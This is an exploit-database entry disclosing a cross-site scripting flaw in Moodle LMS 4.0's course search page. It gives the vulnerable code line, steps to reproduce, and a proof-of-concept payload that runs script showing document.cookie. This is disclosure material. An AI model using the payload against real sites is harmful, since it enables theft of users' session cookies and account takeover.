Moodle LMS 4.0 - Cross-Site Scripting (XSS)
Author: Saud Alenazi
type: webapps
platform: php
port:
date_added: 2023-03-28
date_updated: 2023-03-28
verified: 0
codes:
tags:
aliases:
screenshot_url:
application_url:
raw file: 51115.txt
type: webapps
platform: php
port:
date_added: 2023-03-28
date_updated: 2023-03-28
verified: 0
codes:
tags:
aliases:
screenshot_url:
application_url:
raw file: 51115.txt
# Exploit Title: Moodle LMS 4.0 - Cross-Site Scripting (XSS) # Date: 26/10/2022 # Exploit Author: Saud Alenazi # Vendor Homepage: https://moodle.org/ # Software Link: https://git.in.moodle.com/moodle # Version: 4.0 # Tested on: XAMPP, Windows 10 # Contact: https://twitter.com/dmaral3noz Description: A Cross Site Scripting (XSS) vulnerability exists in Moodle is a free and open-source Learning Management System (LMS) written in PHP and distributed under the GNU General Public License Vulnerable Code: line 111 in file "course/search.php" echo $courserenderer->search_courses($searchcriteria); Steps to exploit: 1) Go to http://localhost/course/search.php 2) Insert your payload in the "search" Proof of concept (Poc): The following payload will allow you to run the javascript - "><img src=# onerror=alert(document.cookie)>
Copyright © 2024 Irfan TOOR all rights reserved.